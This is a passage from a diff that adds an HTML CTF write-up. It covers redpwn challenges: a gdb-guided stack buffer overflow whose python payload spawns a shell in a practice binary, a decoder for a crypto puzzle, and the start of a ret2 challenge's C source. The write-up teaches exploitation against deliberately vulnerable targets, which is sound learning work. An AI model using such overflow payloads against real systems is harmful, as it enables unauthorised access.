+'a' key on my keyboard, but if we were to send raw bytes, this would make it a
+lot easier.
+ &lt;/p&gt;
+ &lt;p&gt;
+  I'm also using
+  &lt;a href="https://github.com/hugsy/gef"&gt;
+   gef
+  &lt;/a&gt;
+  so I get access to a command
+called
+  &lt;code&gt;
+   context
+  &lt;/code&gt;
+  which prints all sorts of information about registers, the
+stack and a small dissassembly window. I won't show it's output here, but it
+was an indispensable tool that you should install nonetheless.
+ &lt;/p&gt;
+ &lt;p&gt;
+  Let's print the memory at
+  &lt;code&gt;
+   [$rbp - 0x8]
+  &lt;/code&gt;
+  :
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   (gdb) x/8gx $rbp - 0x8
+0x7fffffffd758:  0x0000000000000000 0x0000000000000000
+0x7fffffffd768:  0x00007ffff7de4b25 0x00007fffffffd858
+0x7fffffffd778:  0x0000000100000064 0x00000000004011f6
+0x7fffffffd788:  0x0000000000001000 0x00000000004012c0
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  Hmmm, no overwriteage yet. Let's try 56 bytes instead:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   (gdb) run &lt; &lt;(python3 -c "print('a' * 56)")
+(gdb) x/8gx $rbp - 0x8
+0x7fffffffd758:  0x6161616161616161 0x6161616161616161
+0x7fffffffd768:  0x00007ffff7de4b00 0x00007fffffffd858
+0x7fffffffd778:  0x0000000100000064 0x00000000004011f6
+0x7fffffffd788:  0x0000000000001000 0x00000000004012c0
+(gdb) x/1gx $rbp - 0x8
+0x7fffffffd758: 0x6161616161616161
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  Jackpot! We've overwritten 16 bytes of the adress that the
+  &lt;code&gt;
+   cmp
+  &lt;/code&gt;
+  instruction
+reads. Let's try setting it to
+  &lt;code&gt;
+   0xff
+  &lt;/code&gt;
+  instead, so we get a shell. Python 3 is
+not that great for binary exploitation, so the code for this is a little bit
+ugly, but if it works, it works!
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   (gdb) run &lt; &lt;(python3 -c "import sys; sys.stdout.buffer.write(b'a' * 40 + b'\xff' * 8)")
+(gdb) x/1gx $rbp - 0x8
+0x7fffffffd758: 0xffffffffffffffff
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  Now let's let execution continue as normal by using the
+  &lt;code&gt;
+   continue
+  &lt;/code&gt;
+  command:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   (gdb) continue
+Continuing.
+[Detaching after vfork from child process 22950]
+[Inferior 1 (process 22947) exited normally]
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  This might seem underwhelming, but our explit works! A child process was
+spawned, and as a bonus, we didn't get any segmentation faults! The reason we
+don't get an interactive shell is because we used python to pipe input into the
+program which makes it non-interactive.
+ &lt;/p&gt;
+ &lt;p&gt;
+  At this point I was about 12 hours in of straight gdb hell, and I was very
+happy to see this shell. After discovering this, I immediately tried it outside
+the debugger and was dissapointed to see that my exploit didn't work. After a
+small panick attack I found out this was because of my environment variables.
+You can launch an environment-less shell by using the
+  &lt;code&gt;
+   env -i sh
+  &lt;/code&gt;
+  command:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   λ generic → λ git master* → env -i sh
+sh-5.1$ python3 -c "import sys; sys.stdout.buffer.write(b'a' * 40 + b'\xff' * 8)" | ./beginner-generic-pwn-number-0
+"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨"
+rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!
+can you write me a heartfelt message to cheer me up? :(
+sh-5.1$ # another shell :tada:
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  Now it was time to actually do the exploit on the remote server.
+ &lt;/p&gt;
+ &lt;p&gt;
+  I whipped up the most disgusting and janky python code that I won't go into
+detail about, but here's what is does (in short):
+ &lt;/p&gt;
+ &lt;ol&gt;
+  &lt;li&gt;
+   Create a thread to capture data from the server and forward it to
+   &lt;code&gt;
+    stdout
+   &lt;/code&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   Capture user commands using
+   &lt;code&gt;
+    input()
+   &lt;/code&gt;
+   and decide what to do with them on the main thread
+  &lt;/li&gt;
+ &lt;/ol&gt;
+ &lt;p&gt;
+  The code for this script can be found
+  &lt;a href="https://github.com/lonkaars/redpwn/blob/master/challenges/generic/pwn.py"&gt;
+   here
+  &lt;/a&gt;
+  ,
+though be warned, it's
+  &lt;em&gt;
+   very
+  &lt;/em&gt;
+  janky and you're probably better off copying
+stuff from stackoverflow. Writing your own tools is more fun though, and might
+also be faster than trying to wrestle with existing tools to try to get them to
+do exactly what you want them to do. In this case I could've also just used
+  &lt;a href="https://reverseengineering.stackexchange.com/questions/13928/managing-inputs-for-payload-injection?noredirect=1&amp;lq=1"&gt;
+   a
+siple
+command
+  &lt;/a&gt;
+  .
+ &lt;/p&gt;
+ &lt;p&gt;
+  It did help me though and I actually had to copy it for use in the other buffer
+overflow challenge that I solved, so I'll probably refactor it someday for use
+in other CTFs.
+ &lt;/p&gt;
+ &lt;h3 id="cryptoround-the-bases"&gt;
+  crypto/round-the-bases
+ &lt;/h3&gt;
+ &lt;p&gt;
+  This crypto challenge uses a text file with some hidden information. If you
+open up the file in a text editor, and adjust your window width, you'll
+eventually see the repeating pattern line up. This makes it very easy to see
+what part of the pattern is actually changing:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;code&gt;
+   ----------------------xxxx----
+[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
+[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
+[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
+[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
+[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
+[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
+[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
+[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
+[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
+[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
+[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
+[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
+[9km7D9mTfc:..Zt9mTZ_:K0o09mTN
+[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
+[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN
+  &lt;/code&gt;
+ &lt;/pre&gt;
+ &lt;p&gt;
+  I wrote a simple python script to parse this into binary data, and it worked on
+the first try:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;div class="prismjs"&gt;
+   &lt;code class="language-py" style="white-space:pre"&gt;
+    &lt;span class="token comment"&gt;
+     # read the file into a string
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     file
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     open
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "./round-the-bases"
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     content
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     file
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     .
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     read
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     file
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     .
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     close
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token comment"&gt;
+     # split on every 30th character into a list
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     n
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     30
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     arr
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     [
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     content
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     [
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     i
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     :
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     i
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     +
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     n
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ]
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     for
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     i
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     in
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     range
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     0
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     len
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     content
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     n
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ]
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     bin
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     [
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ]
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     for
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     line
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     in
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     arr
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     :
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     sub
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     line
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     [
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     16
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     :
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     20
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ]
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token comment"&gt;
+     # the part that changes
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     if
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     sub
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     ==
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     'IIcu'
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     :
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token comment"&gt;
+     # IIcu -&gt; 0x0
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     bin
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     .
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     append
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     '0'
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     else
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     :
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token comment"&gt;
+     #             K0o0 -&gt; 0x1
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     bin
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     .
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     append
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     '1'
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     bin
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     ''
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     .
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     join
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     bin
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token comment"&gt;
+     # join all the list indices together into a string
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token comment"&gt;
+     # decode the binary string into ascii characters
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     for
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     i
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     in
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     range
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     0
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     len
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     bin
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     8
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     :
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     print
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     chr
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     int
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token builtin"&gt;
+     bin
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     [
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     i
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     :
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     i
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     +
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     8
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ]
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     2
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     end
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     ''
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token comment"&gt;
+     # newline for good measure
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     print
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "\n"
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     end
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     ''
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+   &lt;/code&gt;
+  &lt;/div&gt;
+ &lt;/pre&gt;
+ &lt;h3 id="pwnret2generic-flag-reader"&gt;
+  pwn/ret2generic-flag-reader
+ &lt;/h3&gt;
+ &lt;p&gt;
+  This was the second binary exploitation challenge I tackled, and it went much
+better than the first because I (sort of) knew what I was doing by now.
+ &lt;/p&gt;
+ &lt;p&gt;
+  I figured the 'ret2' part of the title challenge was short for 'return to', and
+my suspicion was confirmed after looking at the c source:
+ &lt;/p&gt;
+ &lt;pre&gt;
+  &lt;div class="prismjs"&gt;
+   &lt;code class="language-c" style="white-space:pre"&gt;
+    &lt;span class="token macro property directive-hash"&gt;
+     #
+    &lt;/span&gt;
+    &lt;span class="token macro property directive keyword"&gt;
+     include
+    &lt;/span&gt;
+    &lt;span class="token macro property"&gt;
+    &lt;/span&gt;
+    &lt;span class="token macro property string"&gt;
+     &lt;stdio.h&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token macro property directive-hash"&gt;
+     #
+    &lt;/span&gt;
+    &lt;span class="token macro property directive keyword"&gt;
+     include
+    &lt;/span&gt;
+    &lt;span class="token macro property"&gt;
+    &lt;/span&gt;
+    &lt;span class="token macro property string"&gt;
+     &lt;string.h&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token macro property directive-hash"&gt;
+     #
+    &lt;/span&gt;
+    &lt;span class="token macro property directive keyword"&gt;
+     include
+    &lt;/span&gt;
+    &lt;span class="token macro property"&gt;
+    &lt;/span&gt;
+    &lt;span class="token macro property string"&gt;
+     &lt;stdlib.h&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     void
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     super_generic_flag_reading_function_please_ret_to_me
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     {
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     char
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     flag
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     [
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     0x100
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ]
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     {
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     0
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     }
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     FILE
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     *
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     fp
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     =
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     fopen
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "./flag.txt"
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "r"
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     if
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     !
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     fp
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     {
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     puts
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token string"&gt;
+     "no flag!! contact a member of rob inc"
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     exit
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token operator"&gt;
+     -
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     1
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     }
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     fgets
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     flag
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token number"&gt;
+     0xff
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ,
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     fp
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     puts
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     flag
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     fclose
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+     fp
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     ;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     }
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     int
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token function"&gt;
+     main
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     (
+    &lt;/span&gt;
+    &lt;span class="token keyword"&gt;
+     void
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     )
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class="token punctuation"&gt;
+     {
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
+    &lt;span class=""&gt;
+    &lt;/span&gt;
